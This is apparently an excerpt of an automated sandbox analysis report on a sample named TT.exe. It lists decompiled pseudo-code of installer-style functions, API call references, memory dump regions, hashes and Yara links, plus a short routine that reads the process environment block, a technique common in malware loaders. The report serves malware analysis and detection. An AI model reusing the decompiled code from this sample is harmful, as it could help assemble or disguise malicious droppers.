                                                0x004056e5
                                                0x004056ec
                                                0x00000000
                                                0x004056ec
                                                0x004056a8
                                                0x004056b2
                                                0x00000000
                                                0x00405676
                                                0x00405676
                                                0x0040567c
                                                0x004056b7
                                                0x00000000
                                                0x004056be
                                                0x00405685
                                                0x0040568c
                                                0x00405691
                                                0x00000000
                                                0x00405691
                                                0x00405674
                                                0x004054af
                                                0x004054b3
                                                0x004054bb
                                                0x004054bf
                                                0x004054c2
                                                0x004054c5
                                                0x004054c8
                                                0x004054cb
                                                0x004054cc
                                                0x004054cd
                                                0x004054e6
                                                0x004054e9
                                                0x004054f3
                                                0x00405502
                                                0x0040550a
                                                0x00405512
                                                0x00405517
                                                0x0040551a
                                                0x00405526
                                                0x0040552f
                                                0x00405538
                                                0x0040555a
                                                0x00405560
                                                0x00405571
                                                0x00405576
                                                0x00405584
                                                0x00405592
                                                0x00405592
                                                0x00405597
                                                0x004055a5
                                                0x004055a5
                                                0x004055aa
                                                0x004055ad
                                                0x004055b2
                                                0x004055be
                                                0x004055c7
                                                0x004055d4
                                                0x004055e3
                                                0x004055d6
                                                0x004055db
                                                0x004055db
                                                0x004055ef
                                                0x004055ef
                                                0x00405603
                                                0x0040560c
                                                0x00405615
                                                0x00405625
                                                0x00405631
                                                0x00405631
                                                0x00000000

                                                APIs
                                                • GetDlgItem.USER32 ref: 004054EC
                                                • GetDlgItem.USER32 ref: 004054FB
                                                • GetClientRect.USER32 ref: 00405538
                                                • GetSystemMetrics.USER32 ref: 0040553F
                                                • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405560
                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405571
                                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405584
                                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405592
                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055A5
                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055C7
                                                • ShowWindow.USER32(?,00000008), ref: 004055DB
                                                • GetDlgItem.USER32 ref: 004055FC
                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040560C
                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405625
                                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405631
                                                • GetDlgItem.USER32 ref: 0040550A
                                                  • Part of subcall function 004042E1: SendMessageA.USER32(00000028,?,00000001,00404111), ref: 004042EF
                                                • GetDlgItem.USER32 ref: 0040564D
                                                • CreateThread.KERNEL32 ref: 0040565B
                                                • CloseHandle.KERNEL32(00000000), ref: 00405662
                                                • ShowWindow.USER32(00000000), ref: 00405685
                                                • ShowWindow.USER32(?,00000008), ref: 0040568C
                                                • ShowWindow.USER32(00000008), ref: 004056D2
                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405706
                                                • CreatePopupMenu.USER32 ref: 00405717
                                                • AppendMenuA.USER32 ref: 0040572C
                                                • GetWindowRect.USER32 ref: 0040574C
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405765
                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057A1
                                                • OpenClipboard.USER32(00000000), ref: 004057B1
                                                • EmptyClipboard.USER32 ref: 004057B7
                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 004057C0
                                                • GlobalLock.KERNEL32 ref: 004057CA
                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057DE
                                                • GlobalUnlock.KERNEL32(00000000), ref: 004057F7
                                                • SetClipboardData.USER32 ref: 00405802
                                                • CloseClipboard.USER32 ref: 00405808
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: PB
                                                • API String ID: 590372296-3196168531
                                                • Opcode ID: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
                                                • Instruction ID: 9c2a32fab53b6b0d4bb0e075a5e6b47c54eb8059f7c6cc06f8c9c6988e8d3156
                                                • Opcode Fuzzy Hash: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
                                                • Instruction Fuzzy Hash: 42A16C71A00608BFDB119FA0DE85AAE7BB9FB48354F40403AFA44B61A0CB794E51DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040473E, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 78%
                                                			E0040473E(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x420528;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405928(0x3fb, _t146);
					E00406503(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405928(0x3fb, _t146);
							if(E00405CAE(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00406228(0x41fd20, _t146);
							_t87 = E00406631(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406228(0x41fd20, _t146);
								_t89 = E00405C59(0x41fd20);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41fd20,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41fd20) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41fd20,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C07(0x41fd20);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41fd20) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BD2(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x423f1c; // 0x6ab3d5
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BBA(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41fd10);
									} else {
										E00404AF5(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x424804 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042CE(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420d40 == _t158) {
									E00404697();
								}
								 *0x420d40 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420d50;
							_v60 = E00404A8F;
							_v56 = _t146;
							_v68 = E004062BB(_t146, 0x420d50, _t166, 0x420128, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BC0(_t146);
								_t125 =  *((intOrPtr*)( *0x424754 + 0x11c));
								if( *((intOrPtr*)( *0x424754 + 0x11c)) != 0 && _t146 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E004062BB(_t146, 0x420d50, _t166, 0, _t125);
									if(lstrcmpiA(0x4236e0, 0x420d50) != 0) {
										lstrcatA(_t146, 0x4236e0);
									}
								}
								 *0x420d40 =  *0x420d40 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C2D(_t146) != 0 && E00405C59(_t146) == 0) {
						E00405BC0(_t146);
					}
					 *0x423f18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042AC(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042AC(_t166);
					E004042E1(_t165);
					_t138 = E00406631(8);
					if(_t138 == 0) {
						L53:
						return E00404313(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                0x0040473e
                                                0x00404744
                                                0x0040474a
                                                0x00404757
                                                0x00404765
                                                0x00404768
                                                0x00404770
                                                0x00404776
                                                0x00404776
                                                0x00404782
                                                0x00404785
                                                0x004047f3
                                                0x004047fa
                                                0x004048d1
                                                0x004048d8
                                                0x004048e7
                                                0x004048e7
                                                0x004048eb
                                                0x004048f5
                                                0x00404902
                                                0x00404904
                                                0x00404904
                                                0x00404912
                                                0x00404919
                                                0x00404920
                                                0x00404923
                                                0x0040495a
                                                0x0040495c
                                                0x00404962
                                                0x00404967
                                                0x0040496b
                                                0x0040496d
                                                0x0040496d
                                                0x00404989
                                                0x00000000
                                                0x0040498b
                                                0x0040498e
                                                0x0040499c
                                                0x004049a2
                                                0x004049a3
                                                0x004049a6
                                                0x004049a9
                                                0x00000000
                                                0x004049a9
                                                0x00404925
                                                0x00404927
                                                0x0040492b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040492d
                                                0x0040492d
                                                0x0040493a
                                                0x0040493f
                                                0x00000000
                                                0x00000000
                                                0x00404943
                                                0x00404945
                                                0x00404945
                                                0x0040494d
                                                0x0040494f
                                                0x00404952
                                                0x00404955
                                                0x00404958
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404958
                                                0x004049b5
                                                0x004049bf
                                                0x004049c2
                                                0x004049c5
                                                0x004049cc
                                                0x004049cc
                                                0x004049ce
                                                0x004049ce
                                                0x004049d3
                                                0x004049d5
                                                0x004049dd
                                                0x004049e4
                                                0x004049e6
                                                0x004049f1
                                                0x004049f1
                                                0x004049e6
                                                0x004049f8
                                                0x00404a01
                                                0x00404a0b
                                                0x00404a13
                                                0x00404a2e
                                                0x00404a15
                                                0x00404a1e
                                                0x00404a1e
                                                0x00404a13
                                                0x00404a33
                                                0x00404a38
                                                0x00404a3d
                                                0x00404a46
                                                0x00404a46
                                                0x00404a4f
                                                0x00404a51
                                                0x00404a51
                                                0x00404a5d
                                                0x00404a65
                                                0x00404a6f
                                                0x00404a6f
                                                0x00404a74
                                                0x00000000
                                                0x00404a74
                                                0x00404923
                                                0x004048da
                                                0x004048e1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004048e1
                                                0x00404800
                                                0x00404809
                                                0x00404823
                                                0x00404828
                                                0x00404832
                                                0x00404839
                                                0x00404845
                                                0x00404848
                                                0x0040484b
                                                0x00404852
                                                0x0040485a
                                                0x0040485d
                                                0x00404861
                                                0x00404868
                                                0x00404870
                                                0x004048ca
                                                0x00404872
                                                0x00404873
                                                0x0040487a
                                                0x00404884
                                                0x0040488c
                                                0x00404899
                                                0x004048ad
                                                0x004048b1
                                                0x004048b1
                                                0x004048ad
                                                0x004048b6
                                                0x004048c3
                                                0x004048c3
                                                0x00404870
                                                0x00000000
                                                0x00404828
                                                0x00404816
                                                0x00000000
                                                0x00000000
                                                0x0040481c
                                                0x00000000
                                                0x00404787
                                                0x00404794
                                                0x0040479d
                                                0x004047aa
                                                0x004047aa
                                                0x004047b1
                                                0x004047b7
                                                0x004047c0
                                                0x004047c3
                                                0x004047c6
                                                0x004047ce
                                                0x004047d1
                                                0x004047d4
                                                0x004047da
                                                0x004047e1
                                                0x004047e8
                                                0x00404a7a
                                                0x00404a8c
                                                0x004047ee
                                                0x004047f1
                                                0x00000000
                                                0x004047f1
                                                0x004047e8

                                                APIs
                                                • GetDlgItem.USER32 ref: 0040478D
                                                • SetWindowTextA.USER32(00000000,?), ref: 004047B7
                                                • SHBrowseForFolderA.SHELL32(?,00420128,?), ref: 00404868
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404873
                                                • lstrcmpiA.KERNEL32(uvlcopdlxoed,00420D50,00000000,?,?), ref: 004048A5
                                                • lstrcatA.KERNEL32(?,uvlcopdlxoed), ref: 004048B1
                                                • SetDlgItemTextA.USER32 ref: 004048C3
                                                  • Part of subcall function 00405928: GetDlgItemTextA.USER32 ref: 0040593B
                                                  • Part of subcall function 00406503: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\TT.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040655B
                                                  • Part of subcall function 00406503: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406568
                                                  • Part of subcall function 00406503: CharNextA.USER32(?,"C:\Users\user\Desktop\TT.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040656D
                                                  • Part of subcall function 00406503: CharPrevA.USER32(?,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040657D
                                                • GetDiskFreeSpaceA.KERNEL32(0041FD20,?,?,0000040F,?,0041FD20,0041FD20,?,00000001,0041FD20,?,?,000003FB,?), ref: 00404981
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040499C
                                                  • Part of subcall function 00404AF5: lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
                                                  • Part of subcall function 00404AF5: wsprintfA.USER32 ref: 00404B9B
                                                  • Part of subcall function 00404AF5: SetDlgItemTextA.USER32 ref: 00404BAE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$C:\Users\user\AppData\Local\Temp$PB$uvlcopdlxoed
                                                • API String ID: 2624150263-2867915712
                                                • Opcode ID: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
                                                • Instruction ID: 829ad80b7ad659a1b6830b16dd2e7c43b5ac75723c1b4fdd6e47fb9b3f087a68
                                                • Opcode Fuzzy Hash: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
                                                • Instruction Fuzzy Hash: 48A18FB1A00209ABDB11EFA5DD45AAF7BB8EF84314F10843BF601B62D1D77C99418B6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C2D( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408418, _t87, 1, 0x408408, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408428, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\engineer\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                0x00402174
                                                0x0040217e
                                                0x00402188
                                                0x00402195
                                                0x004021a0
                                                0x004021a3
                                                0x004021bd
                                                0x004021c3
                                                0x004021c9
                                                0x004021cc
                                                0x004021d6
                                                0x004021da
                                                0x004021da
                                                0x004021df
                                                0x004021f0
                                                0x004021f8
                                                0x004022d4
                                                0x004022d4
                                                0x004022db
                                                0x004021fe
                                                0x004021fe
                                                0x0040220d
                                                0x00402211
                                                0x00402214
                                                0x0040221a
                                                0x00402228
                                                0x0040222b
                                                0x0040222d
                                                0x00402238
                                                0x00402238
                                                0x0040223d
                                                0x0040223f
                                                0x00402246
                                                0x00402246
                                                0x00402249
                                                0x00402252
                                                0x00402255
                                                0x0040225a
                                                0x0040225c
                                                0x00402269
                                                0x00402269
                                                0x0040226c
                                                0x00402278
                                                0x0040227b
                                                0x00402284
                                                0x0040228a
                                                0x00402291
                                                0x004022aa
                                                0x004022ac
                                                0x004022ba
                                                0x004022ba
                                                0x004022aa
                                                0x004022bd
                                                0x004022c3
                                                0x004022c3
                                                0x004022c6
                                                0x004022cc
                                                0x004022d2
                                                0x004022e7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004022d2
                                                0x004022dd
                                                0x00402a5d
                                                0x00402a69

                                                APIs
                                                • CoCreateInstance.OLE32(00408418,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ByteCharCreateInstanceMultiWide
                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                • API String ID: 123533781-1104044542
                                                • Opcode ID: b8edfd5adafe673e92bf7c77ec57b049cfece64d8502f07e39ea1df42828875f
                                                • Instruction ID: 849b10897e6abda320580ec11bca4de19dcbd678575eb1056a8185fe26502568
                                                • Opcode Fuzzy Hash: b8edfd5adafe673e92bf7c77ec57b049cfece64d8502f07e39ea1df42828875f
                                                • Instruction Fuzzy Hash: BC510671A00208AFCB00DFE4C988A9D7BB6EF48314F2045BAF515EB2D1DA799981CB14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 39%
                                                			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406186(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E00406228();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                0x004027b9
                                                0x004027cd
                                                0x004027d8
                                                0x004027d9
                                                0x00402918
                                                0x004027bb
                                                0x004027bb
                                                0x004027bd
                                                0x004027bf
                                                0x004027bf
                                                0x00402a5d
                                                0x00402a69

                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: a2663e28504c86572081c005267ca85bcb47b559b3db158810a8a5f7ec55b55d
                                                • Instruction ID: a7d85d328faede53e6a1e3b4f28690110558ed3aa0613785cbf8ce06a9006afe
                                                • Opcode Fuzzy Hash: a2663e28504c86572081c005267ca85bcb47b559b3db158810a8a5f7ec55b55d
                                                • Instruction Fuzzy Hash: 35F0A771704111EED710EB649A49AEEB7A8DF51314F20067FF112B60C1D7B88946972A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 030218F0, Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.344683936.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                • Instruction ID: f8b40a0ac2cf6a3689f0b41e26db5533f62eec967495fda24302cf383e84dffe
                                                • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                • Instruction Fuzzy Hash: 4A014D79A11218EFCB80DF99C58099DBBF4FB08220F1184D6E859E7311E330AE50DB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 030216D8, Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.344683936.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10001000, Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E10001000() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                                0x10001017

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.344782910.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
